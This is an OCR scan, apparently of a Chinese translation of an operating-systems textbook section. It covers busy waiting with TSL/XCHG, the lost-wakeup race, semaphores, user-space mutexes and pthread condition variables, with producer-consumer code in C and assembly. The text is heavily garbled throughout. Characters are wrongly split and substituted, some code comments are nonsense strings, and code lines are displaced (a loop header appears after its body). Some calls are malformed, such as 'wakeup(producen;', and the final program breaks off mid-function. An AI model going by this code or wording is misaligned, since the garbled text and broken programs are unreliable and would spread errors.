MOVE REGISTER,#1 | 在 寄存 器 中 放 一 个 1 
XCHG REGISTER,LOCK | 交换 寄存 器 与 锁 变 量 的 内 容 
CMP REGISTER,#0 | 锁 是 零 吗 ? 
JNE enter_region | 若 不 是 零 ， 说 明 锁 已 被 设置 ， 因 此 循环 


RET | 返回 调用 者 ， 进 入 临界 区 


leave_region: 
MOVE LOCK,#0 | 在 锁 中 存 入 0 
RET 1 返回 调用 者 


图 2-26 用 XCHG 指 令 进 入 和 离开 临界 区 


2.3.4 ”睡眠 与 唤醒 


Peterson 解 法 和 TSL 或 XCHG 人 解法 都 是 正确 的 ， 但 它们 都 有 忙 等 得 
的 缺点 。 这些 解法 在 本 质 上 是 这 样 的 : 当 一 个 进程 想 进 入 临界 区 时 ， 
先 检查 是 否 允 许 进 入 ， 若 不 允许 ， 则 该 进程 将 原 地 等 待 ， 直 到 人 允许 为 
上 o 


这 种 方法 不 仅 当 费 了 CPU 时 间 ， 而 且 还 可 能 引起 预想 不 到 的 结 
果 。 考 虑 一 台 计 算 机 有 两 个 进程 ，H 优 移 级 较 高 ， 工 优先 级 较 低 。 调 度 
规则 规定 ， 只 要 H 处 于 吏 绻 仿 它 束 可 以 运行 。 在 某 一 时 刻 ， 工 处 于 量 界 
区 中 ， 此 时 H 变 到 就 绪 态 ， 准 备 运行 〈 例 如 ， 一 条 IO 操作 结束 ) 。 现 
在 H 开 始 忙 等 待 ， 但 由 于 当 H 就 绪 时 不 会 被 调度 ， 也 束 无 法 离开 临界 
区 ， 所 以 H 将 永远 忙 等 待 下 去 。 这 种 情况 有 时 被 称 作 优 先 级 反 转 问题 


(priority inversion problem) ° 


现在 来 考察 几 条 进程 间 通 信 原 语 ， 它 们 在 无 法 进入 临界 区 时 将 阻 
寒 ， 而 不 是 忙 等 待 。 最 简单 的 是 sleep 和 wakeup。sleep 是 一 个 将 引起 调 
用 进程 阻塞 的 系统 调用 ， 即 被 挂 起 ， 直 到 另外 一 个 进程 将 其 唤醒 。 

wakeup 调 用 有 一 个 参数 ， 即 要 被 唤醒 的 进程 。 男 一 种 方法 是 让 sleep 和 
wakeup 各 有 一 个 参数 ， 即 有 一 个 用 于 匹配 sleep 和 wakeup 的 内 存 地 址 。 


生产 者 -消费 着 问 题 


作为 使 用 这 些 原 语 的 一 个 例子 ， 我 们 考虑 生产 者 -消费 者 
(producer-consumer) 问题 ， 也 称 作 有 界 缓冲 区 (bounded-buffer) 问 
题 。 两 个 进程 共享 一 个 公共 的 固定 大 小 的 缓冲 区 。 其 中 一 个 是 生产 
者 ， 将 信息 放 入 缓冲 区 ， 另 一 个 是 消费 者 ， 从 缓冲 区 中 取出 信息 。 
(也 可 以 把 这 个 问题 一 般 化 为 m 个 生产 者 和 n 个 消费 者 问题 ， 但 是 我 们 
只 讨论 一 个 生产 者 和 一 个 消费 者 的 情况 ， 这 样 可 以 简化 解决 方案 。) 


问题 在 于 当 绥 冲 区 已 满 ， 而 此 时 生产 者 还 想 癌 其 中 放 入 一 个 新 的 
数据 项 的 情况 。 其 解决 办 法 是 让 生产 者 睡眠 ， 待 消费 者 从 缓冲 区 中 取 
出 一 个 或 多 个 数据 项 时 再 唤醒 它 。 同 样 地 ， 当 消费 者 试图 从 缓冲 区 中 
取 数 据 而 发 现 缓冲 区 为 空 时 ， 消 费 者 整 睡眠， 直到 生产 者 向 其 中 放 入 
一 些 数 据 时 再 将 其 唤醒 。 


这 个 方法 听 起 来 很 和 测 单 ， 但 它 包 含 与 前 边 假 脱 机 目录 问题 一 样 的 
苋 争 条 件 。 为 了 跟踪 缓冲 区 中 的 数据 项 数 ， 我 们 需要 一 个 变量 count 。 
如 果 绥 冲 区 最 多 存放 N 个 数据 项 ， 则 生产 者 代码 将 百 先 检查 count 是 否 
达到 N， 奉 是 ， 则 生产 者 睡眠 ， 否 则 生产 者 疝 缓冲 区 中 放 入 一 个 数据 项 
并 增 量 count 的 值 。 


消费 者 的 代码 与 此 类 似 : 首先 测试 count 是 否 为 0， 者 是 ， 则 睡眠 ; 
否则 从 中 取 走 一 个 数据 项 并 递减 count 的 值 。 每 个 进程 同时 也 检测 另 一 
个 进程 是 否 应 被 唤醒 ， 大 是 则 唤醒 之 。 生 产 者 和 消费 者 的 代码 如 图 2-27 
ITZ ° 


#define N 100 Jt Beh PX HH A AY */ 
int count = 0; /* 缓冲 区 中 的 数据 项 数目 */ 


void producer(void) 


int item; 


while (TRUE) { 作 无 限 循环 2 
item = produce_item(); 六 产生 下 一 新 数据 项 */ 
if (count == N) sleep(); 此 如 果 缓 冲 区 满 了 ， 就 进入 休眠 状态 */ 
insert_item(item); PKG Bt) 数据 项 放 入 缓冲 区 中 */ 
count = count + 1; 上 将 缓冲 区 的 数据 项 计数 器 增 1 */ 
if (count == 1) wakeup(consumer); /* 缓冲 区 空 吗 ? */ 


void consumer(void) 


int item; 

/* 无 限 循 环 */ 

i oi ; /* 如 果 缓 冲 区 室 ， 则 进入 休眠 状态 */ 
if (count == 0) sleep(); /# 从 缓冲 区 中 取出 一 个 数据 项 */ 
item = remove_item(); A 

count = count — 1; 1 将 缓冲 区 的 数据 项 计数 器 减 1 */ 

if (count == N — 1) wakeup(producen; /* Skip iing? */ 

consume _item(item); /* 打印 数据 项 */ 


while (TRUE) { 


图 2-27 SAM RRP AR ED E-H A All 


为 了 在 C 语 言 中 表示 sleep 和 wakeup 这 样 的 系统 调用 ， 我 们 将 以 库 画 
数 调用 的 形式 来 表示 。 尽管 它 们 不 是 标准 C 库 的 一 部 分 ， 但 在 实际 上 任 
何 系 统 中 都 具有 这 些 库 芳 数 。 示 列 出 的 过 程 insert_item 和 remove_item 用 
来 记录 将 数据 项 放 入 缓冲 区 和 从 缓冲 区 取出 数据 等 事项 。 


现在 回 到 芜 争 条 件 的 问题 。 这 里 有 可 能 会 出 现 苋 争 条 件 ， 其 原因 
是 对 count 的 访问 未 加 限制 。 有 可 能 出 现 以 下 情况 : 缓冲 区 为 空 ， 消 费 
者 刚刚 读 取 count 的 值 发 现 它 为 0。 此 时 调度 程序 决定 暂停 消费 者 并 启动 


SIEPE o EP SARK PAPE, counti ° 现在 
count 的 值 变 成 了 1。 它 推 昕 认为 由 于 count 刚 才 为 0， 所 以 消费 者 此 时 一 
EER, eer" a Vel H wakeup Hite 。 


但 是 ， 消 费 痢 此 时 在 逻辑 上 并 未 睡眠 ， 所 以 wakeup 信 号 丢失 。 当 
消 缆 者 下 次 运行 时 ， 它 将 测试 完 前 读 到 的 count 值 ， 发 现 它 为 0， 于 古 睡 
有 眠 。 生 产 者 迟早 会 填 满 整个 缓冲 区 ， 然 后 睡眠 。 这 样 一 来 ， 两 个 进程 
都 将 永远 睡眠 下 去 。 


问题 的 实质 在 于 发 给 一 个 ( 尚 ) 未 睡眠 进程 的 wakeup 信 号 丢失 
了 。 如 采 它 没有 丢失 ， 则 一 切 都 很 正 前 。 一 种 快速 的 弥补 方法 是 修改 
规则 ， 加 上 一 个 唤醒 等 待 位。 当 一 个 wakeup 信 和 号 发 送 给 一 个 清醒 的 进 
程 信号 时 ， 将 该 位 置 1。 随 后 ， 当 该 进程 要 睡眠 时 ， 如 条 唤醒 等 竺 位 为 
1， 则 将 该 位 清除 ， 而 该 进程 仍然 保持 清醒 。 唤 醒 等 竺 位 实际 上 融 是 


wakeup 信 号 的 一 个 小 仓库 。 


尽管 在 这 个 简单 例子 中 用 唤醒 等 竺 位 的 方法 解决 了 问题 ， 但 是 我 
们 很 容易 就 可 以 构造 出 一 些 例子 ， 其 中 有 三 个 或 更 多 的 进程 ， 这 时 一 
个 唤醒 等 行 位 束 不 够 使 用 了 。 于 是 我 们 可 以 再 打 一 个 补丁 ， 加 入 第 二 
个 唤醒 等 待 位， 甚至 是 8 个 、32 个 等 ， 但 原则 上 讲 ， 这 并 没有 从 根本 上 
解决 问题 。 


信号 量 是 E.W.Dijkstra 在 1965 年 提出 的 一 种 方法 ， 它 使 用 一 个 整 型 
变量 来 累计 唤醒 次 数 ， 供 以 后 使 用 。 在 他 的 建议 中 引入 了 一 个 新 的 变 
量 类 型 ， 称 作 信 和 号 量 (semaphore) 。 一 个 信号 量 的 取 值 可 以 为 0 (表示 
没有 保存 下 来 的 唤醒 操作 ) 或 者 为 正 值 (表示 有 一 个 或 多 个 唤醒 操 
作 ) 。 


Dijkstra 建 议 设立 两 种 操作 : down 和 up (分 别 为 一 般 化 后 的 sleep 和 
wakeup) 。 对 一 信号 量 执 行 down 操 作 ， 则 是 检查 其 值 是 否 大 于 0。 若 该 
值 大 于 0， 则 将 其 值 减 1 ( 即 用 掉 一 个 保存 的 唤醒 信号 ) 并 继续 ， 若 该 
值 为 0%， 则 进程 将 睡眠 ， 而 且 此 时 down 操 作 并 未 结束 。 检 查 数值 、 修 改 
变量 值 以 及 可 能 发 生 的 睡眠 操作 均 作 为 一 个 单一 的 、 不 可 分 割 的 原子 
操作 完成 。 保 证 一 旦 一 个 信号 量 操 作 开 始 ， 则 在 该 操作 完成 或 阻 蹇 之 
前 ， 其 他 进程 均 不 允许 访问 该 信号 量 。 这 种 原子 性 对 于 解决 同步 问题 
和 避免 竞争 条 件 是 绝对 必要 的 。 所 谓 原 子 操作 ， 是 指 一 组 相关 联 的 操 
作 要 么 都 不 间断 地 执行 ， 要 么 都 不 执行 。 原 子 操作 在 计算 机 科学 的 其 
他 领域 也 是 非常 重要 的 。 


up 操作 对 信和 号 量 的 值 增 1。 如 采 一 个 或 多 个 进程 在 该 信号 量 上 有 睡 
有 眠 ， 无 法 完成 一 个 先前 的 down 操 作 ， 则 由 系统 选择 其 中 的 一 个 (如 随 
机 挑选 ) 并 允许 该 进程 完成 它 的 down 操 作 。 于 是 ， 对 一 个 有 进程 在 其 


上 睡眠 的 信号 量 执行 一 次 up 操作 之 后 ， 该 信号 量 的 值 仍旧 是 0， 但 在 其 
上 睡眠 的 进程 却 少 了 一 个 。 信 和 号 量 的 值 增 1 和 唤醒 一 个 进程 同样 也 是 不 
可 分 割 的 。 不 会 有 某 个 进程 因 执 行 up 而 阻塞 ， 正 如 在 前 面 的 模型 中 不 
会 有 进程 因 执 行 wakeup 而 阻塞 一 样 。 


顺便 提 一 下 ， 在 Dijkstra 原 来 的 论文 中 ， 他 分 别 使 用 名 称 P 和 V 而 不 
是 down 和 up， 人 和 荷兰 语 中 ，Proberen 的 意思 是 和 演 试 ，Verhogen 的 含义 是 增 
加 或 升 高 。 由 于 对 于 不 讲 荷 兰 语 的 读者 来 说 采用 什么 记号 并 无 大 的 干 
系 ， 所 以 我 们 将 使 用 down 和 up 和 名称。 它们 在 程序 设计 语言 Algol 68 中 首 
vert 


用 信号 量 解 决 生产 者 -消费 者 问题 


用 信和 号 量 解决 丢失 的 wakeup 问 题 ， 如 岁 2-28 所 示 。 为 确保 信和 号 量 
能 正确 工作 ， 最 重要 的 是 要 采用 一 种 不 可 分 割 的 方式 来 实现 它 。 通 般 
征 将 up 和 down 作 为 系统 调用 实现 ， 而 且 操 作 系统 只 需 在 执行 以 下 操作 
时 和 暂时 屏蔽 全 部 中 断 : 测试 信 号 量 、 更 新 信号 量 以 及 在 需要 时 使 某 个 
进程 睡眠 。 由 于 这 些 动作 只 需要 几 条 指令 ， 所 以 屏蔽 中 断 不 会 带 来 什 
么 副作用 。 如 采 使 用 多 个 CPU， 则 每 个 信号 量 应 由 一 个 锁 变量 进行 你 
护 。 通 过 TSL 或 XCHG 指 令 来 确保 同一 时 刻 只 有 一 个 CPU 在 对 信号 量 进 
行 操作 。 


读者 必须 搞 清楚 ， 使 用 TSL 或 XCHG 指 令 来 防止 几 个 CPU 同 时 访问 
一 个 信号 量 ， 这 与 生产 者 或 消费 者 使 用 忙 等 待 来 等 待 对 方 腾 出 或 填充 
缓冲 区 是 完全 不 同 的 。 信 和 号 量 操作 仅 需 几 个 毫秒 ， 而 生产 者 或 消费 者 
则 可 能 需要 任意 长 的 时 间 。 


该 解决 方案 使 用 了 三 个 信号 量 : 一 个 称 为 full， 用 来 记录 充满 的 缓 
冲 权 数目 ;一 个 称 为 empty， 记 录 空 的 缓冲 槽 总 数 ; 一 个 称 为 mutex， 
用 来 确保 生产 者 和 消费 者 不 会 同时 访问 缓冲 区 。full 的 初 值 为 0，empty 
的 初 值 为 缓冲 区 中 横 的 数目 ，mutex 初 值 为 1° 供 两 个 或 多 个 进程 使 用 
的 信号 量 ， 其 初 值 为 1， 保 证 同时 只 有 一 个 进程 可 以 进入 临界 区 ， 称 作 
二 元 信号 量 (binary semaphore) 。 如 果 每 个 进程 在 进入 临界 区 前 都 执 
行 一 个 down 操 作 ， 并 在 刚刚 退出 时 执行 一 个 up 操作 ， 就 能 够 实现 互 
JF ° 
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顺序 。 在 使 用 信号 量 的 系统 中 ， 隐 藏 中 断 的 最 自然 的 方法 是 为 每 一 个 
IO 设备 设置 一 个 信号 量 ， 其 初 值 为 0。 在 局 动 一 个 IO 设备 之 后 ， 管 理 
进程 就 立即 对 相关 联 的 信号 量 执行 一 个 down 操 作 ， 于 是 进程 立即 被 阻 
塞 。 当 中 断 到 来 时 ， 中 断 处 理 程 序 随后 对 相关 信和 号 量 执行 一 个 up 操 
作 ， 从 而 将 相关 的 进程 设置 为 就 绪 状 态 。 在 该 模型 中 ， 图 2-5 中 的 第 5 步 
包括 在 设备 的 信号 量 上 执行 up 操作 ， 这 样 在 第 6 步 中 ， 调 度 程序 将 能 执 
行 设备 管理 程序 。 当 然 ， 如 果 这 时 有 几 个 进程 就 绪 ， 则 调度 程序 下 次 


可 以 选择 一 个 更 为 重要 的 进程 来 运行 。 在 本 章 的 后 续 内 容 中 ， 我 们 将 
看 到 调度 算法 是 如 何 进行 的 。 


在 图 2-28 的 例子 中 ， 我 们 实际 上 古 通 过 两 种 不 同 的 方式 来 使 用 信号 
量 ， 两 者 之 间 的 区 别 是 很 重要 的 。 信 和 号 量 mutex 用 于 互 不 ， 它 用 于 保证 
任 一 时 刻 只 有 一 个 进程 读 写 缓冲 区 和 相关 的 变量 。 互 斤 是 避免 寝 乱 所 
必需 的 操作 。 在 下 一 市 中 ， 我 们 将 讨论 互 不 量 及 其 实现 方法 。 


#define N 100 /* Rep Xe P HRR H */ 

typedef int semaphore; /* 信号 量 是 一 种 特殊 的 整 型 数据 */ 
semaphore mutex = 1; 1 控制 对 临界 区 的 访问 */ 
semaphore empty = N; 1* 计数 缓冲 区 的 空 槽 数目 */ 
semaphore full = 0; /* 计数 缓冲 区 的 满 槽 数目 */ 


void producer(void) 


{ 


int item; 


while (TRUE) { /* TRUE 是 常量 1 */ 
item = produce_item( ); 谍 产 生 放 在 缓冲 区 中 的 一 些 数据 / 
down(&empty); /* 将 空 槽 数目 减 1 */ 
down(&mutex); 访 进 入 临界 区 */ 
insert_item(item); 1 将 新 数据 项 放 到 缓冲 区 中 */ 
up(&mutex); /* 离开 临界 区 */ 
up(&full); /* KR BY Be */ 


void consumer(void) 


int item; 


while (TRUE) { /* 无 限 循环 */ 
down(&full); > 将 满 槽 数目 减 1 */ 
down(&mutex); /* 进入 临界 区 */ 
item = remove_item( ); * 从 缓冲 区 中 取出 数据 项 */ 
up(&mutex); /* 离开 临界 区 */ 
up(&empty); /* 将 空 槽 数目 加 1 */ 
consume _item(item); /* 处 理 数 据 项 */ 


图 2-28 使 用 信号 量 的 生产 者 -消费 者 问题 


言 号 量 的 另 一 种 用 途 是 用 于 实现 同步 (synchronization) 。 信 和 号 量 
ful 和 empty 用 来 保证 某 种 事件 的 顺序 发 生 或 不 发 生 。 在 本 例 中 ， 它 们 
保证 当 缓 冲 区 满 的 时 候 生 产 者 停止 运行 ， 以 及 当 缓冲 区 空 的 时 候 消费 
者 停止 运行 。 这 种 用 法 与 互 不 是 不 同 的 。 


2.3.6 AS 


如 有 果 不 需 要 信号 量 的 计数 能 力 ， 有 时 可 以 使 用 信和 号 量 的 一 个 简化 
版 本 ， 称 为 互 斥 量 (mutex) 。 互 不 量 仅 仪 适用 于 管理 共享 资源 或 一 小 
段 代码 。 由 于 互 不 量 在 实现 时 既 容易 又 有 效 ， 这 使 得 互 不 量 在 实现 用 
户 空 间 线程 包 时 非常 有 用 。 


互 不 量 是 一 个 可 以 处 于 两 态 之 一 的 变量 : 解锁 和 加 锁 。 这 样 ， 只 
需要 一 个 二 进 制 位 表示 它 ， 不 过 实际 上 ， 和 常常 使 用 一 个 整 型 量 ，0 表 示 
解锁 ， 而 其 他 所 有 的 值 则 表示 加 锁 。 互 扩 量 使 用 两 个 过 程 。 当 一 个 线 
Ke 〈 或 进程 ) 需要 访问 临界 区 时 ， 它 调用 mutex_lock。 如 果 该 互 斥 量 当 
前 是 解锁 的 〈 即 临界 区 可 用 ) ， 此 调用 成 功 ， 调 用 线程 可 以 自由 进入 
该 临界 区 。 


男 一 方面 ， 如 果 该 互 不 量 已 经 加 锁 ， 调 用 线程 被 阻塞 ， 直 到 在 临 
界 区 中 的 线程 完成 并 调用 mutex_unlock。 如 果 多 个 线程 被 阻塞 在 该 互 不 
量 上 ， 将 随机 选择 一 个 线程 并 允许 它 获 得 锁 。 


由 于 互 不 量 非常 简单 ， 所 以 如 果 有 可 用 的 TSL 或 XCHG 指 令 ， 束 可 
以 很 容易 地 在 用 户 空 间 中 实现 它们 。 用 于 用 户 级 线程 包 的 mutex_lock 和 
mutex_unlock 代 码 如 图 2-29 所 示 。XCHG 人 解法 本 质 上 是 相同 的 。 


mutex __lock: FR OES A 
TSL REGISTER,MUTEX | 将 互 斥 信号 量 [复制 到 寄存 器， 并 且 将 互 斥 信号 量 置 为 1 
CMP REGISTER,#0 | 互 斥 信号 量 是 0 吗 4? 
JZE ok PTE 斥 信和 号 写 量 为 0， P 所 以 返回 


CALL thread_yield Bea Sat; 调度 男 
JMP mutex_lock | 稍 后 再 试 
ok: RET 1 返回 调用 者 ， 进 入 临界 区 


mutex_unlock: 
MOVE MUTEX #0 | 将 mutex 置 为 0 
RET | 返回 调用 者 


图 2-29 ”mutex_lock 和 mutex_unlock 的 实现 


mutex_lock 的 代码 与 图 2-25 中 enter_region 的 代码 很 相似 ， 但 有 一 个 
关键 的 区 别 。 当 enter_region 进 入 临界 区 失败 时 ， 它 始终 重复 测试 锁 
Cee) 。 实 际 上 ， 由 于 时 钟 超时 的 作用 ， 会 调度 其 他 进程 运行 
这 样 迟早 拥有 锁 的 进程 会 进入 运行 并 释放 锁 。 


在 (用户 ) 线程 中 ， 情 形 有 所 不 同 ， 因 为 没有 时 钟 停 止 运行 时 间 
过 长 的 线程 。 结 琳 是 通过 性 等 得 的 方式 来 试图 获得 饼 的 线程 将 永远 循 
环 下 去 ， 决 不 会 得 到 锁 ， 因 为 这 个 运行 的 线程 不 会 让 其 他 线程 运行 从 
而 释放 锁 。 


以 上 就 是 enter_region 和 mutex_lock 的 差别 所 在 。 在 后 者 取 锁 失败 
时 ， 它 调用 thread_yield 将 CPU 放弃 给 另 一 个 线程 。 这 样 ， 束 没有 忙 等 
寺 。 在 该 线程 下 次 运行 时 ， 它 再 一 次 对 锁 进 行 测试 。 


由 于 thread_yield 只 是 在 用 户 空间 中 对 线程 调度 程序 的 一 个 调用 ， 
所 以 它 的 运行 非常 快捷 。 这 样 ，mutex_lock 和 mutex_unlock 都 不 需要 任 


何 内 核 调 用 。 通 过 使 用 这 些 过 程 ， 用 户 线程 完全 可 以 实现 在 用 户 空间 
中 的 同步 ， 这 些 过 程 仅仅 需要 少量 的 指令 。 


上 面 所 叙述 的 互 斤 量 系统 生 一 父 调 用 框 采 。 对 于 软件 来 说 ， 总 二 
需要 更 多 的 特性 ， 而 同步 原 语 也 不 例外 。 例 如 ， 有 时 线程 包 提供 一 个 
调用 mutex_trylock， 这 个 调用 或 考 获 得 锁 或 者 返回 失败 码 ， 但 并 不 阻 压 
线程 。 这 束 给 了 调用 线程 一 个 灵活 性 ， 用 以 决定 下 一 步 做 什么 ， 是 使 
用 替代 办 法 还 只 是 等 每 下 去 。 


到 目前 为 止 ， 我们 掩盖 了 一 个 问题 ， 不 过 现在 还 是 有 必要 把 这 个 
问题 所 出 来 。 在 用 户 级 线程 包 中 ， 多 个 线程 访问 同一 个 互 斤 量 是 没有 
问题 的 ， 因 为 所 有 的 线程 都 在 一 个 公共 地 址 空间 中 操作 。 但 是 ， 对 于 
大 多 数 早期 解决 方案 ， 诸 如 Peterson 算 法 和 信和 号 量 等 ， 都 有 一 个 未 说 明 
的 前 提 ， 即 这 些 多 个 进程 至 少 应 该 访问 一 些 共 享 内 存 ， 也 许 仅 仅 是 一 
个 字 。 如 采 进 程 有 不 连续 的 地 址 空间 ， 如 我 们 始终 提 到 的 ， 那 么 在 


Peterson 算 法 、 信 和 号 量 或 缓冲 区 中 ， 它 们 如 何 共 至 turn 变 量 呢 ? 


有 两 种 方案 。 第 一 种 ， 有 些 共 译 数据 结构 ， 如 信号 量 ， 可 以 存放 
在 内 核 中 ， 并 且 只 能 通过 系统 调用 来 访问 。 这 种 处 理 方式 化 解 了 上 述 
问题 。 第 二 种 ， 多 数 现代 操作 系统 (包括 UNIX 和 Windows) 提供 一 种 
方法 ， 让 进程 与 其 他 进程 共享 其 部 分 地 址 空间 。 在 这 种 方法 中 ， 绥 冲 
区 和 其 他 数据 结构 可 以 共享 。 在 最 坏 的 情形 下 ， 如 果 没有 可 共有 至 的 途 
径 ， 则 可 以 使 用 共享 文件 。 


如 采 两 个 或 多 个 进程 共享 其 全 部 或 大 部 分 地 址 空间 ， 进 程 和 线程 
之 则 的 差别 整 变 得 模糊 起 来 ， 但 无 论 直 样 ， 两 者 的 奔 别 还 是 有 的 。 共 
享 一 个 公共 地 址 空间 的 两 个 进程 仍旧 有 各 自 的 打开 文件 、 报 警 定时 名 
以 及 其 他 一 些 单个 进程 的 特性 ， 而 在 单个 进程 中 的 线程 ， 则 共享 进程 
全 部 的 特性 。 另 外 ， 共 享 一 个 公共 地 址 空间 的 多 个 进程 决 不 会 拥有 用 
户 级 线程 的 效率 ， 这 一 点 是 不 容 置 颖 的， 因为 内 核 还 同 其 管理 密切 相 
oe 


Pthread 中 的 互 不 


Pthread 提 供 许 多 可 以 用 来 同步 线程 的 范 数 。 其 基本 机 制 是 使 用 一 
个 可 以 被 锁定 和 解锁 的 互 不 量 来 保护 每 个 临界 区 。 一 个 线程 如 果 想 要 
进入 临界 区 ， 它 首先 笑 试 鲍 住 相关 的 互 不 量 。 如 来 互 不 量 没 有 加 锁 ， 
那么 这 个 线程 可 以 立即 进入 ， 并 且 该 互 斥 量 被 目 动 锁定 以 防止 其 他 线 
程 进入 。 如 有 条 互 斥 量 已 经 被 加 锁 ， 则 调用 线程 被 阻塞， 直到 该 互 斤 量 
家 解锁 。 如 条 多 个 线程 在 等 竺 同一 个 互 斥 量 ， 当 它 被 解锁 时 ， 这 些 等 
待 的 线程 中 只 有 一 个 被 允许 运行 并 将 互 扩 量 重新 锁定 。 这 些 互 斤 锁 不 
征 强 制 性 的 ， 而 是 由 程序 员 来 保证 线程 正确 地 使 用 它们 。 


与 互 不 量 相 关 的 主要 函数 调用 如 图 2-30 所 示 。 就 像 所 期 待 的 那样 ， 
可 以 创建 和 撤销 互 斥 量 。 实 现 它们 的 函数 调用 分 别 是 pthread_mutex_init 
与 pthread_mnutex_destroy。 也 可 以 通过 pthread_mnutex_lock 给 互 斥 量 加 
锁 ， 如 果 该 互 斥 量 已 被 加 锁 时 ， 则 会 阻塞 调用 者 。 还 有 一 个 调用 可 以 


用 来 莹 试 锁 住 一 个 互 斥 量 ， 当 互 斥 量 已 被 加 锁 时 会 返回 错误 代码 而 不 
是 阻塞 调用 者 。 这 个 调用 就 是 pthread_mutex_trylock。 如 果 需 要 的 话 ， 
该 调用 允许 一 个 线程 有 效 地 忙 等 待 。 最 后 ，pthread_mutex_unlock 用 来 
给 一 个 互 斥 量 解锁 ， 并 在 一 个 或 多 个 线程 等 待 它 的 情况 下 正确 地 释放 
一 个 线程 。 互 斥 量 也 可 以 有 属性 ， 但 是 这 些 属性 只 在 某 些 特殊 的 场合 
PERS 


pthread_mutex_init 创建 一 个 互 斥 量 
pthread_mutex_destroy 改 销 一 个 已 存在 的 互 斥 量 


pthread_mutex_lock 获得 一 个 锁 或 阻塞 
pthread_mutex_trylock | 获得 一 个 锁 或 失败 


pthread_mutex_unlock 释放 一 个 锁 


Al 2-30 一 些 与 互 不 量 相关 的 pthread 调 用 


除 互 不 量 之 外 ，pthread 提 供 了 男 一 种 同步 机 制 ， 条 件 变 量 。 互 不 
量 在 允许 或 阻 窗 对 临界 区 的 访问 上 是 很 有 用 的 ， 条 件 变 量 则 允许 线程 
由 于 一 些 未 达到 的 条 件 而 阻塞 。 绝 大 部 分 情况 下 这 两 种 方法 是 一 起 使 
用 的 。 现 在 让 我 们 进一步 地 人 研究 线程 、 互 不 量 、 条 件 变 量 之 则 的 关 
联 。 


举 一 个 简单 的 例 于 ， 再 次 考虑 一 下 生产 者 -消费 者 问题 : 一 个 线程 
将 产品 放 在 一 个 缓冲 区 内 ， 由 另 一 个 线程 将 它们 取出 。 如 采 生 产 者 发 
现 缓冲 区 中 没有 空 槽 可 以 使 用 了 ， 它 不 得 不 阻塞 起 来 直到 有 一 个 空 模 
可 以 使 用 。 生 产 着 使 用 互 斤 量 可 以 进行 原子 性 检查 ， 而 不 受 其 他 线程 
干扰 。 但 是 当 发 现 缓冲 区 已 经 满 了 以后， 生产 者 需要 一 种 方法 来 阻塞 
目 己 并 在 以 后 被 唤 醒 。 这 便 是 条 件 变 量 做 的 事 了 。 


与 条 件 变 量 相关 的 pthread 调 用 如 图 2-31 所 示 。 就 像 你 可 能 期 待 的 那 
样 ， 这 里 有 专门 的 调用 用 来 创建 和 撤销 条 件 变量 。 它 们 可 以 有 属性 ， 
并 且 有 不 同 的 调用 来 管理 它们 (图 中 没有 显示 ) 。 与 条 件 变 量 相关 的 
最 重要 的 两 个 操作 是 pthread_cond_wait 和 pthread_cond_signal。 前 者 阻 
塞 调 用 线程 直到 男 一 其 他 线程 向 它 发 信号 (使 用 后 一 个 调用 ) 。 当 
然 ， 阻 塞 与 等 待 的 原因 不 是 等 待 与 发 信号 协议 的 一 部 分 。 被 阻塞 的 线 
程 经 常 是 在 等 待 发 信号 的 线程 去 做 某 些 工作 、 释 放 某 些 资 源 或 是 进行 
其 他 的 一 些 活动 。 只 有 完成 后 被 阻塞 的 线程 才 可 以 继续 运行 。 条 件 变 
量 允 许 这 种 等 待 与 阻塞 原子 性 地 进行 。 当 有 多 个 线程 被 阻塞 并 等 待 同 
一 个 信号 时 ， 可 以 使 用 pthread_cond_broadcast 调 用 。 


线程 调用 
创建 一 个 条 件 变 量 


回 另 一 个 线程 发 信号 
来 唤醒 它 

加 多 个 线程 发 信号 来 
让 它们 全 部 唤醒 


图 2-31 一 些 与 条 件 变量 相关 的 pthread 调 用 


条 件 变 量 与 互 不 量 经 常 一 起 使 用 。 这 种 模式 用 于 让 一 个 线程 尔 住 
一 个 互 不 量 ， 然 后 当 它 不 能 获得 它 期 待 的 结果 时 等 待 一 个 条 件 变 量 。 
最 后 男 一 个 线程 会 向 它 发 信号 ， 使 它 可 以 继续 执行 。pthread_cond_wait 
原子 性 地 调用 并 解锁 它 持 有 的 互 扩 量 。 由 于 这 个 原因 ， 互 斤 量 是 参数 
了 


值得 指出 的 是 ， 条 件 变量 (不 像 信 号 量 ) 不 会 存在 内 存 中 。 如 果 
将 一 个 信号 量 传递 给 一 个 没有 线程 在 等 待 的 条 件 变 量 ， 那 么 这 个 信和 号 


吕 会 寺 失 。 程 序 员 必须 小 心 使 用 避免 丢失 信和 号 。 


作为 如 何 使 用 一 个 互 不 量 与 条 件 变 量 的 例子 ， 图 2-32 展 示 了 一 个 非 
香 简 单 只 有 一 个 缓冲 区 的 生产 者 -消费 者 问题 。 当 生产 者 填 满 缓冲 区 
时 ， 它 在 生产 下 一 个 数据 项 之 前 必须 等 每 ， 直 到 消费 者 清空 了 它 。 类 


似 地 ， 当 消费 者 移 走 一 个 数据 项 时 ， 它 必须 等 待 ， 直 到 生产 者 生产 了 
另外 一 个 数据 项 。 尽 管 很 测 单 ， 这 个 例子 却说 明了 基本 的 机 制 。 使 一 
个 线程 睡眠 的 语句 应 该 总 是 要 检查 这 个 条 件 ， 以 保证 线程 在 继续 执行 
前 满足 条 件 ， 因 为 线程 可 能 已 经 因为 一 个 UNIX 信 号 或 其 他 原因 而 被 唤 


HE o 


#include <stdio.h> 

#include <pthread.h> 

#define MAX 1000000000 上 六 需要 生产 的 数量 

pthread_mutex_tthe_mutex; 

pthread_cond_t condc, condp; : 

int buffer = 0; A* 生 产 者 消费 者 使 用 的 缓冲 区 %/ 

void *producer(void *ptr) [* Æ BH */ 

{ int i; 

for (i= 1; i <= MAX; i++) { an ee laces 

pthread_mutex_lock(&the_mutex); /* 互 斥 使 用 缓冲 区 */ 
while (buffer != 0) pthread_cond_wait(&condp, &the_ mutex); 
buffer = i; 疡 将 数据 放 入 缓冲 区 */ 
pthread_cond_signal(&condc); /唤醒 消费 者 */ 
pthread_mutex_unlock(&the_mutex); [HE EEK */ 


} 
pthread_exit(0); 
} 


void *consumer(void “ptr) I* 消费 数据 */ 
{ int i; 
for (i = 1; i <= MAX; i++) { 

pthread_mutex_lock(&the_mutex); /* 互 斥 使 用 缓冲 区 */ 
while (buffer ==0 ) pthread_cond_wait(&condc, &the_mutex); 
buffer = 0; * 从 缓冲 区 中 取出 数据 */ 
pthread_cond_signal(&condp); E 唤 醒 生 产 者 */ 
pthread_mutex_unlock(&the_mutex);，/* 释放 缓冲 区 */ 


} 
pthread_exit(0); 


} 
int main(int argc, char **argv) 


pthread_t pro, con; 
pthread_mutex_init(&the mutex, 0); 
pthread_cond_init(&condec, 0); 
